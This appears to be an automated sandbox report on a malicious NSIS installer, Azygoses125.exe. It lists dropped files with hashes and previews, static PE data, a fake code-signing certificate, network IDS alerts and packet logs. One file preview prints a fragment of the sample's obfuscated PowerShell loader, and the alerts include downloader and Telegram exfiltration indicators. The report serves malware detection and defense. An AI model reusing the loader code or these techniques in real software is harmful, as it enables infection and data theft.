C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_rdtpj1ra.fo1.ps1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\nsd8E32.tmp

Download File

Process:	C:\Users\user\Desktop\Azygoses125.exe
File Type:	data
Category:	dropped
Size (bytes):	10743093
Entropy (8bit):	0.5928730033790938
Encrypted:	false
SSDEEP:	6144:Gg2y1tFXeLvxe+w2LKwgOpGyBEcIvmqz9lFGOSLE0PWzN6Kf/sMfNDefBcC2mq3C:GEwe+NL2OwmZHoyE0PWz4tM1qfTIS
MD5:	9AFC042ADFB3F19BDA41A6E6F4EBF941
SHA1:	903E634F7236AFBA47B9319BD33EF40C5F97D3E3
SHA-256:	5359A57F6D464424432E3C19BB425CFD335572A9BFE29509D7E51A51E6A1224F
SHA-512:	B37EC51C91EFF190471D8C23AFD83D4959AF82ECF89DB8BA8D685B54986CD12413BB9DA56D72AEF1343262FA48F8A0C34299951A2786B9A6CA3ED3A63DC77460
Malicious:	false
Preview:	........,...................p...............................................................................................................................................................................................................................................................G...R...............j...............................................................................................................................#...........6...+....(..................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\nsq93A2.tmp\nsExec.dll

Download File

Process:	C:\Users\user\Desktop\Azygoses125.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	modified
Size (bytes):	6656
Entropy (8bit):	5.139253382998066
Encrypted:	false
SSDEEP:	96:s7fhfKaGgchPzxK6bq+pKX6D8ZLidGgmkN838:UbGgGPzxeX6D8ZyGgmkN
MD5:	1B0E41F60564CCCCCD71347D01A7C397
SHA1:	B1BDDD97765E9C249BA239E9C95AB32368098E02
SHA-256:	13EBC725F3F236E1914FE5288AD6413798AD99BEF38BFE9C8C898181238E8A10
SHA-512:	B6D7925CDFF358992B2682CF1485227204CE3868C981C47778DD6DA32057A595CAA933D8242C8D7090B0C54110D45FA8F935A1B4EEC1E318D89CC0E44B115785
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Joe Sandbox View:	Filename: WYnv59N83j.exe, Detection: malicious, Browse Filename: t6V3uvyaAP.exe, Detection: malicious, Browse Filename: WYnv59N83j.exe, Detection: malicious, Browse Filename: t6V3uvyaAP.exe, Detection: malicious, Browse Filename: Unspuriousness.exe, Detection: malicious, Browse Filename: Unspuriousness.exe, Detection: malicious, Browse Filename: Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exe, Detection: malicious, Browse Filename: Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exe, Detection: malicious, Browse Filename: SecuriteInfo.com.W32.AIDetect.malware2.20337.14221.exe, Detection: malicious, Browse Filename: SecuriteInfo.com.W32.AIDetect.malware2.20337.14221.exe, Detection: malicious, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........................,..................Rich...........PE..L...[..V...........!......................... ...............................P.......................................$..l.... ..P............................@....................................................... ...............................text............................... ..`.rdata..L.... ......................@..@.data........0......................@....reloc.......@......................@..B................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\magmaet\clenched\Azygoses125.exe

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
Category:	dropped
Size (bytes):	765176
Entropy (8bit):	7.952906605942075
Encrypted:	false
SSDEEP:	12288:hDGZKmormA1WTNBX5CN/8DCYz1JqAxQJuPLaDbguIsFFfDF/dvJimLQrU+UvdmBp:vmor/1WNBYN/iXqAxQJW0kTsF/im/mBp
MD5:	723E8D7420209E5658D32EBEAEA45B9C
SHA1:	1FAB08989ECE01ECD3F485D33A921DD553CCC393
SHA-256:	29807B7BBE150C4005266B07919615984FCC9DEC19052AE262374635024C9E2B
SHA-512:	BD1BB8EE484F3D0768CE1AFDBC4091E168613F0D162142F8FBF916BBCF5E5E40F43FECF1452976BAF898ABE4077DB184EFDA918BBEDC472016953FB7F6E470E4
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 29%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1...P...P...P.._...P...P..NP.._...P..s...P...V...P..Rich.P..........................PE..L...y..V.................b...*.......3............@..................................>....@.............................................................@............................................................................................text...^a.......b.................. ..`.rdata..p............f..............@..@.data...X............z..............@....ndata...@...............................rsrc...............................@..@................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\magmaet\clenched\Azygoses125.exe:Zone.Identifier

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	26
Entropy (8bit):	3.95006375643621
Encrypted:	false
SSDEEP:	3:ggPYV:rPYV
MD5:	187F488E27DB4AF347237FE461A079AD
SHA1:	6693BA299EC1881249D59262276A0D2CB21F8E64
SHA-256:	255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
SHA-512:	89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
Malicious:	true
Preview:	[ZoneTransfer]....ZoneId=0

C:\Users\user\AppData\Local\magmaet\clenched\Feltdefinition.Mej

Download File

Process:	C:\Users\user\Desktop\Azygoses125.exe
File Type:	data
Category:	dropped
Size (bytes):	298128
Entropy (8bit):	7.688558087480768
Encrypted:	false
SSDEEP:	6144:ag2y1tFXeLvxe+w2LKwgOpGyBEcIvmqz9lFGOSLE0PWzN6Kf/d:aEwe+NL2OwmZHoyE0PWz4U
MD5:	8EE7284EDB9D51BC050DF373249BF227
SHA1:	101B642B9A71513C06FB6BFF84C068FB456CD516
SHA-256:	2C45FBF06A5DC115D518E12674070767A582F68DF30A4EADFFA2EAF8AAA9B53E
SHA-512:	7439D672B6C78400297B507968FF9CD45F56B5672765475307E8B8A8B84B462653F743F69CC8DA32E35863475B65E15EDB24230E67EC777CA4BBF1A4274B241F
Malicious:	false
Preview:	...xxx.._....X.........d..................................~.....)))...... ...+++.::::...............................111....Q.UU...........rr.....^...................#.w.......-........g........777..C........aaaaaa...... .... ......cc.."".....-.44.AA. ..J.vvvvv./........aa......_.............cc.........!...........'''.;...................==.................FFF...............S.............h...............bbbbb...................22...m.t....j.............DD..ggggggg................qq............cc....CCCC.R................YYY.A.........................X...E......................*............I...................s.LLLL....................????....q......6............@...N.UU........................0...............===.xx........OO............................\\.........................cc.........wwww.....................n......... ...%%.b............ff.......QQ................[.c..::::.....................yyy._.....................TTTTTTTT..........C........K../.==.?.y...........000

C:\Users\user\AppData\Local\magmaet\clenched\Frontoparietal.ruf

Download File

Process:	C:\Users\user\Desktop\Azygoses125.exe
File Type:	data
Category:	dropped
Size (bytes):	2387610
Entropy (8bit):	0.15942566220329682
Encrypted:	false
SSDEEP:	768:wzAcmELvlCt64oADSmhDEZNe508HYwhsi6zgTmx5upMjAthZFH/Jd3gmXTQu5Y+U:
MD5:	87E50D263F04628637C01FDD66A8F091
SHA1:	C6B097FD62805352C893727A5EDA4BEEDE2E413C
SHA-256:	F59F52215B994807B8ECBB7804CA1C8B4214A8BAAA2DD465E49080B695410842
SHA-512:	3E0BF1BDFEBFF9C29E0C82B0E37EBEC4FE6D94954391658F6CD95E485B76AA7E6FAE87CB70E809684B060A5C966855EE9EB4E8EEB6F178A23BA1E5B69F7954F7
Malicious:	false
Preview:	.....................................................................................................................................................&................................................................................................................................................................................................................................................#.....................................................................................................................................A..........................................................1.............................................................................'.................................................................u..................................................................................................................................................................................................................................................%.............................

C:\Users\user\AppData\Local\magmaet\clenched\Gascon.Som

Download File

Process:	C:\Users\user\Desktop\Azygoses125.exe
File Type:	Unicode text, UTF-8 text, with very long lines (4231), with CRLF, LF line terminators
Category:	dropped
Size (bytes):	74382
Entropy (8bit):	5.143633665024192
Encrypted:	false
SSDEEP:	1536:Na4LkiR4IiTxXBCCXN2fqPLSftMB5ZPO3SyQC232q36L:NfkpFXNDefCnZP6cC232q3+
MD5:	B044BD82E9954A750FD85843DE1C02A3
SHA1:	E9C94DF0E6E0BDF13AB417D7FAFAD7CD4AAADB43
SHA-256:	54F5C7ACB07BC3496890D8DADAFA2E4B1073118D0E7C7E6C69B95ECDFFABAB98
SHA-512:	827525FBDFA186A99510E24EC56C71EE772BED322FCCA2D61EEF0FCE33DD3D37E64B75ED62D6619973F421220746334DA6B291211472E2C57ECA7DFEE2016351
Malicious:	true
Preview:	$forsvare=$Suricat;........$Kransenedlggelser = @'.m.ibrit. Eupho.$Brom,liTAnorchurG imtedy GestnigTra ficgspoucheeDatisc sVoluptbtForestce is,ami=Unmaneu$OverfreHM.nibusiPrag vrsAscospos MenazoiSeniorsnSy metrg ncont; Unleas. tetrapfPreinspuSpkni gnEigenspcPru elltSamiskei U mateocheapienAlfe sf StabelbM ExpurgiHorsejos GallersLibellueElectroa Ryotwat.oraarsiRe,ussinSt,ongygChr mom Reindu(Graphos$ culpr.P UnsandoAfskibenAtaliewc HerlighAfskrm,oMedmindeFejl,ilnKunstansReinfo., Imbark$ SuffleG TinkerlDendrola TilbrlrGall rymakkumuleKollegisClickletunderkbrLi vidae Saertis Mono anPerflats TvrbjliImmatrisGylpeiltAtomiseeRo.fersr gu,dkosZarifas)rammebe Ustabi {Kontras. Datopa.Fordrej$ npatriA Arv afpQuercicosniffabsHo dlumtOsc,larrPib konoOdysszipFemme.ehAllergoeFenianp Vectorc(ReiteraVSandsyni ippefnGenopfraT,pydelcGymnasie R alito Pinnu.uKababhosPsychic Ensomhe'Ter,alp LymphogxDanmarky FaneeddPeakyste BrushmrYehuditi ntran$WaistleU D ffiloSkolefomUnlitgrsAmfibist mklassdIsoeugeeAetn

C:\Users\user\AppData\Local\magmaet\clenched\aarsungens.bla

Download File

Process:	C:\Users\user\Desktop\Azygoses125.exe
File Type:	data
Category:	dropped
Size (bytes):	2802123
Entropy (8bit):	0.16014721035839247
Encrypted:	false
SSDEEP:	768:RaE9710bnra8qiClzbvAx57Ano7sKqOSTiTSqBoChrYB6j2QwGcklvNWuxDgQ4uv:C
MD5:	A7D919B312C1C74AB4C35A522D946B77
SHA1:	80DBDC65B19CFB6CBE8AECFA41D28F450857DCC5
SHA-256:	09C869BFBB2A5B7CC84D9E0F56C4F9FA728E1F23C2415DDC0E74FC3D39AA6154
SHA-512:	389824FE2C76C6C2204A56ACC7A160D133279B1C0C1F4A0635DA9351C4D82661D31DF2C536DC2A238F040A23AED46ADDD62657350EDFBA6820869B5B9C0473A5
Malicious:	false
Preview:	.............................................................w............................................................................................................................................................................................7..........................................................................................................................................................................^......................................................................................................................................................................................................r....................d..............................................................................................................................v.......................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\magmaet\clenched\forsmgt.txt

Download File

Process:	C:\Users\user\Desktop\Azygoses125.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	398
Entropy (8bit):	4.246758482060977
Encrypted:	false
SSDEEP:	6:oqMiL/AZwy9A2YYut9HLv4CDGcL+iEnHE9DChVgwCtMWIX0FWWAz6CJArAkyVMIb:vMiL/RDttZPDpL0nHlVg1tXqMWjhb
MD5:	A01CF8B2F34D6F8D6A6067AD87AD420F
SHA1:	C49BFD81A1418697165CB62EDBEEF5E8D47157BA
SHA-256:	A85ACBE8F4FAD0CA373D1BC143633962C89D69E1503A3C310E283DA4EF97B4D7
SHA-512:	B4784A1754ABE449C17A5B88E2D4ECA4D0B9A80E5A20416B80CAAF8989FAB9A6BABCD711691D91246C9B1F12BA7C01FD00450AF247AB4E4B64174E79466636D9
Malicious:	false
Preview:	huskers kvierne workingman.maanedsmagasinerne patriotical torpederinger baromacrometer tubful synchronousness logeion syvendelenes cadere spasmolysis..djvlekultens conscripting nebulium snary streamerbaand balfaldaras nonbeatific unwitless diplomate..ressagernes indifferensen inositols saltningen flimsiness.fusioneringen papists taknemlighedglds transpirering,lkagernes frokostmders farthingdeal.

C:\Users\user\AppData\Local\magmaet\clenched\salpen.zoo

Download File

Process:	C:\Users\user\Desktop\Azygoses125.exe
File Type:	data
Category:	dropped
Size (bytes):	5161744
Entropy (8bit):	0.15808018941602964
Encrypted:	false
SSDEEP:	768:T+W5rfWR61urINGFhHyjTYYfH8tfhDPzQnR64u4EMMHPdu6izJlM/j2ZGoDuTmnj:moVSf
MD5:	862F3B806ED8EE61690B5CB807E4039F
SHA1:	63579479347755219148DB8926C9FAE8FF3456A4
SHA-256:	B8664ACCEAFF8EDC30B830CCEE20BF79BAC7D003169E8BD7A4C7FB025BBC83A7
SHA-512:	64B1617EB008A3496732D5737F2602F47796B6342DE64498BB93E1A3D94487FA1167DD008400FD19C46DF013FD6C211420AF4C33A9BAC3E15D13C5BE5984430B
Malicious:	false
Preview:	..................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................e.....................................................................................................................................................................................................................................................................................

C:\Windows\Resources\unthick.ini

Download File

Process:	C:\Users\user\Desktop\Azygoses125.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	33
Entropy (8bit):	4.187889194919351
Encrypted:	false
SSDEEP:	3:bovixgS7v4M2L:TgS7gZL
MD5:	E23F52386361095BDB7040B09E2216AE
SHA1:	91F31DD82AB80140DB621B6DCE0B9B5D6B568723
SHA-256:	36467321184A76E0FEA592D2896856A37EC18FC8480DE66F05D719D93B39D070
SHA-512:	19D18DE54B3466F0D283271786B3B308C3BE07F21174C46563C4C16292716C52F2C1B85F416ED77143EA6847BFC4C4C37F22296948EAC47499276B181F129B9C
Malicious:	false
Preview:	[gap]..predespond=fascinatingly..

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
Entropy (8bit):	7.952906605942075
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	Azygoses125.exe
File size:	765'176 bytes
MD5:	723e8d7420209e5658d32ebeaea45b9c
SHA1:	1fab08989ece01ecd3f485d33a921dd553ccc393
SHA256:	29807b7bbe150c4005266b07919615984fcc9dec19052ae262374635024c9e2b
SHA512:	bd1bb8ee484f3d0768ce1afdbc4091e168613f0d162142f8fbf916bbcf5e5e40f43fecf1452976baf898abe4077db184efda918bbedc472016953fb7f6e470e4
SSDEEP:	12288:hDGZKmormA1WTNBX5CN/8DCYz1JqAxQJuPLaDbguIsFFfDF/dvJimLQrU+UvdmBp:vmor/1WNBYN/iXqAxQJW0kTsF/im/mBp
TLSH:	F2F4236B2310E42BD4207870E5997BFA86F05E6DC454EA872B117D0DBD7A3C3993A7B0
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1...P...P...P.._...P...P..NP.._...P...s...P...V...P..Rich.P..........................PE..L...y..V.................b...*.....

File Icon


Icon Hash:	070b4d61782c178f

Static PE Info

General

Entrypoint:	0x4033b6
Entrypoint Section:	.text
Digitally signed:	true
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Time Stamp:	0x567F8479 [Sun Dec 27 06:26:01 2015 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	7192d3773f389d45ebac3cc67d054a8a

Authenticode Signature

Signature Valid:	false
Signature Issuer:	CN=Cowhages, E=Landingspunkterne@Urentables.des, O=Cowhages, L=Church Lawton, OU="metronymy Maltls haznadar ", S=England, C=GB
Signature Validation Error:	A certificate chain processed, but terminated in a root certificate which is not trusted by the trust provider
Error Number:	-2146762487
Not Before, Not After	30/10/2024 08:32:02 30/10/2025 08:32:02
Subject Chain	CN=Cowhages, E=Landingspunkterne@Urentables.des, O=Cowhages, L=Church Lawton, OU="metronymy Maltls haznadar ", S=England, C=GB
Version:	3
Thumbprint MD5:	B19684B1ACFD8B4B1D421306BFB7FB56
Thumbprint SHA-1:	D11D7ED69F9232A86043C87D93145A21AE570114
Thumbprint SHA-256:	9240A85937EB38F2CA5FD18F51B497D65E97D191C5ACE10E90731C829BA312E7
Serial:	671946870B21E63194A831CCB854A5FECEF0AE3D

Entrypoint Preview

Instruction
sub esp, 000002D4h
push ebp
push esi
push 00000020h
xor ebp, ebp
pop esi
mov dword ptr [esp+0Ch], ebp
push 00008001h
mov dword ptr [esp+0Ch], 0040A230h
mov dword ptr [esp+18h], ebp
call dword ptr [004080B4h]
call dword ptr [004080B0h]
cmp ax, 00000006h
je 00007FAC615B73B3h
push ebp
call 00007FAC615BA50Eh
cmp eax, ebp
je 00007FAC615B73A9h
push 00000C00h
call eax
push ebx
push edi
push 0040A3B0h
call 00007FAC615BA48Bh
push 0040A3A8h
call 00007FAC615BA481h
push 0040A39Ch
call 00007FAC615BA477h
push 00000009h
call 00007FAC615BA4DCh
push 00000007h
call 00007FAC615BA4D5h
mov dword ptr [0042A264h], eax
call dword ptr [00408044h]
push ebp
call dword ptr [004082A8h]
mov dword ptr [0042A318h], eax
push ebp
lea eax, dword ptr [esp+34h]
push 000002B4h
push eax
push ebp
push 00421708h
call dword ptr [0040818Ch]
push 0040A384h
push 00429260h
call 00007FAC615BA0C2h
call dword ptr [004080ACh]
mov ebx, 00435000h
push eax
push ebx
call 00007FAC615BA0B0h
push ebp
call dword ptr [00408178h]

Rich Headers

Programming Language:

[EXP] VC++ 6.0 SP5 build 8804

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x84bc	0xa0	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x4f000	0x1c5c8	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0xba5b8	0x740
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x8000	0x2b8	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x615e	0x6200	41c79e199a2175acbe73d4712982d296	False	0.6625876913265306	data	6.4557374109402	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata	0x8000	0x1370	0x1400	9cbedf8ff452ddf88e3b9cf6f80372a9	False	0.4404296875	data	5.102148788391081	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0xa000	0x20358	0x600	73e3da5d6c2dd1bec8a02d238a90e209	False	0.5149739583333334	data	4.09485328769633	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.ndata	0x2b000	0x24000	0x0	d41d8cd98f00b204e9800998ecf8427e	False	0	empty	0.0	IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc	0x4f000	0x1c5c8	0x1c600	0e60bf3ace34d6a7de54772dad04b786	False	0.8734684746696035	data	7.577852317524115	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_ICON	0x4f418	0xc9c0	PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced	English	United States	0.9973280669144982
RT_ICON	0x5bdd8	0x5d9c	PNG image data, 256 x 256, 8-bit colormap, non-interlaced	English	United States	0.9926556501418795
RT_ICON	0x61b78	0x2e8e	PNG image data, 256 x 256, 4-bit colormap, non-interlaced	English	United States	0.9979023326061419
RT_ICON	0x64a08	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 9600	English	United States	0.4182572614107884
RT_ICON	0x66fb0	0x10a8	Device independent bitmap graphic, 32 x 64 x 32, image size 4224	English	United States	0.45075046904315197
RT_ICON	0x68058	0xea8	Device independent bitmap graphic, 48 x 96 x 8, image size 2304	English	United States	0.6625799573560768
RT_ICON	0x68f00	0x8a8	Device independent bitmap graphic, 32 x 64 x 8, image size 1024	English	United States	0.7382671480144405
RT_ICON	0x697a8	0x668	Device independent bitmap graphic, 48 x 96 x 4, image size 1152	English	United States	0.6317073170731707
RT_ICON	0x69e10	0x568	Device independent bitmap graphic, 16 x 32 x 8, image size 256	English	United States	0.5505780346820809
RT_ICON	0x6a378	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 1088	English	United States	0.6187943262411347
RT_ICON	0x6a7e0	0x2e8	Device independent bitmap graphic, 32 x 64 x 4, image size 512	English	United States	0.7002688172043011
RT_ICON	0x6aac8	0x128	Device independent bitmap graphic, 16 x 32 x 4, image size 128	English	United States	0.8074324324324325
RT_DIALOG	0x6abf0	0x100	data	English	United States	0.5234375
RT_DIALOG	0x6acf0	0x11c	data	English	United States	0.6056338028169014
RT_DIALOG	0x6ae10	0xc4	data	English	United States	0.5918367346938775
RT_DIALOG	0x6aed8	0x60	data	English	United States	0.7291666666666666
RT_GROUP_ICON	0x6af38	0xae	data	English	United States	0.6379310344827587
RT_VERSION	0x6afe8	0x29c	data	English	United States	0.5089820359281437
RT_MANIFEST	0x6b288	0x33f	XML 1.0 document, ASCII text, with very long lines (831), with no line terminators	English	United States	0.5547533092659447

Imports

DLL	Import
KERNEL32.dll	SetCurrentDirectoryW, GetFileAttributesW, GetFullPathNameW, Sleep, GetTickCount, CreateFileW, GetFileSize, MoveFileW, SetFileAttributesW, GetModuleFileNameW, CopyFileW, ExitProcess, SetEnvironmentVariableW, GetWindowsDirectoryW, GetTempPathW, GetCommandLineW, GetVersion, SetErrorMode, lstrlenW, GetCurrentProcess, CompareFileTime, GlobalUnlock, GlobalLock, CreateThread, GetLastError, CreateDirectoryW, CreateProcessW, RemoveDirectoryW, lstrcmpiA, GetTempFileNameW, WriteFile, lstrcpyA, lstrcpyW, MoveFileExW, lstrcatW, GetSystemDirectoryW, LoadLibraryW, GetProcAddress, GetModuleHandleA, ExpandEnvironmentStringsW, GetShortPathNameW, SearchPathW, lstrcmpiW, SetFileTime, CloseHandle, GlobalFree, lstrcmpW, GlobalAlloc, WaitForSingleObject, GetDiskFreeSpaceW, lstrcpynW, GetExitCodeProcess, FindFirstFileW, FindNextFileW, DeleteFileW, SetFilePointer, ReadFile, FindClose, MulDiv, MultiByteToWideChar, lstrlenA, WideCharToMultiByte, GetPrivateProfileStringW, WritePrivateProfileStringW, FreeLibrary, LoadLibraryExW, GetModuleHandleW
USER32.dll	GetSystemMenu, SetClassLongW, IsWindowEnabled, EnableMenuItem, SetWindowPos, GetSysColor, GetWindowLongW, SetCursor, LoadCursorW, CheckDlgButton, GetMessagePos, LoadBitmapW, CallWindowProcW, IsWindowVisible, CloseClipboard, SetClipboardData, EmptyClipboard, OpenClipboard, wsprintfW, ScreenToClient, GetWindowRect, GetSystemMetrics, SetDlgItemTextW, GetDlgItemTextW, MessageBoxIndirectW, CharPrevW, CharNextA, wsprintfA, DispatchMessageW, PeekMessageW, ReleaseDC, EnableWindow, InvalidateRect, SendMessageW, DefWindowProcW, BeginPaint, GetClientRect, FillRect, DrawTextW, EndDialog, RegisterClassW, SystemParametersInfoW, CreateWindowExW, GetClassInfoW, DialogBoxParamW, CharNextW, ExitWindowsEx, DestroyWindow, CreateDialogParamW, GetDC, SetWindowTextW, PostQuitMessage, ShowWindow, GetDlgItem, IsWindow, LoadImageW, SetWindowLongW, TrackPopupMenu, AppendMenuW, CreatePopupMenu, EndPaint, SetTimer, FindWindowExW, SendMessageTimeoutW, SetForegroundWindow
GDI32.dll	SelectObject, SetBkMode, CreateFontIndirectW, SetTextColor, DeleteObject, GetDeviceCaps, CreateBrushIndirect, SetBkColor
SHELL32.dll	SHGetSpecialFolderLocation, SHGetPathFromIDListW, SHBrowseForFolderW, SHGetFileInfoW, ShellExecuteW, SHFileOperationW
ADVAPI32.dll	RegDeleteKeyW, SetFileSecurityW, OpenProcessToken, LookupPrivilegeValueW, AdjustTokenPrivileges, RegOpenKeyExW, RegEnumValueW, RegDeleteValueW, RegCloseKey, RegCreateKeyExW, RegSetValueExW, RegQueryValueExW, RegEnumKeyW
COMCTL32.dll	ImageList_Create, ImageList_AddMasked, ImageList_Destroy
ole32.dll	OleUninitialize, OleInitialize, CoTaskMemFree, CoCreateInstance

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	United States

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2024-12-23T21:50:42.138306+0100	2803270	ETPRO MALWARE Common Downloader Header Pattern UHCa	2	192.168.2.7	49751	172.217.19.174	443	TCP
2024-12-23T21:50:52.410774+0100	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	2	192.168.2.7	49772	132.226.8.169	80	TCP
2024-12-23T21:50:57.985456+0100	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	2	192.168.2.7	49772	132.226.8.169	80	TCP
2024-12-23T21:51:01.472995+0100	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	2	192.168.2.7	49772	132.226.8.169	80	TCP
2024-12-23T21:51:01.988941+0100	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	2	192.168.2.7	49772	132.226.8.169	80	TCP
2024-12-23T21:51:03.616489+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.7	49804	104.21.67.152	443	TCP
2024-12-23T21:51:05.176483+0100	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	2	192.168.2.7	49809	132.226.8.169	80	TCP
2024-12-23T21:51:09.498771+0100	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	2	192.168.2.7	49817	132.226.8.169	80	TCP
2024-12-23T21:51:11.379165+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.7	49823	104.21.67.152	443	TCP
2024-12-23T21:51:25.920925+0100	1810007	Joe Security ANOMALY Telegram Send Message	1	192.168.2.7	49866	149.154.167.220	443	TCP
2024-12-23T21:51:33.808019+0100	1810008	Joe Security ANOMALY Telegram Send File	1	192.168.2.7	49884	149.154.167.220	443	TCP
2024-12-23T21:51:37.675526+0100	1810008	Joe Security ANOMALY Telegram Send File	1	192.168.2.7	49895	149.154.167.220	443	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Dec 23, 2024 21:50:39.504249096 CET	49751	443	192.168.2.7	172.217.19.174
Dec 23, 2024 21:50:39.504286051 CET	443	49751	172.217.19.174	192.168.2.7
Dec 23, 2024 21:50:39.504364014 CET	49751	443	192.168.2.7	172.217.19.174
Dec 23, 2024 21:50:39.519159079 CET	49751	443	192.168.2.7	172.217.19.174
Dec 23, 2024 21:50:39.519180059 CET	443	49751	172.217.19.174	192.168.2.7
Dec 23, 2024 21:50:41.240258932 CET	443	49751	172.217.19.174	192.168.2.7
Dec 23, 2024 21:50:41.240516901 CET	49751	443	192.168.2.7	172.217.19.174
Dec 23, 2024 21:50:41.241333008 CET	443	49751	172.217.19.174	192.168.2.7
Dec 23, 2024 21:50:41.241403103 CET	49751	443	192.168.2.7	172.217.19.174
Dec 23, 2024 21:50:41.288296938 CET	49751	443	192.168.2.7	172.217.19.174
Dec 23, 2024 21:50:41.288325071 CET	443	49751	172.217.19.174	192.168.2.7
Dec 23, 2024 21:50:41.288697958 CET	443	49751	172.217.19.174	192.168.2.7
Dec 23, 2024 21:50:41.288763046 CET	49751	443	192.168.2.7	172.217.19.174
Dec 23, 2024 21:50:41.291475058 CET	49751	443	192.168.2.7	172.217.19.174
Dec 23, 2024 21:50:41.335377932 CET	443	49751	172.217.19.174	192.168.2.7
Dec 23, 2024 21:50:42.138319969 CET	443	49751	172.217.19.174	192.168.2.7
